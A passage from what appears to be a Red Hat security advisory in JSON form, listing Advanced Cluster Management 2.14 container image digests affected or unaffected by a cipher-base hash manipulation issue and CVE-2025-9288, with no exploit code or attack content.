"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cipher-base: Cipher-base hash manipulation"
},
{
"cve": "CVE-2025-9288",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-08-20T23:00:56.263191+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
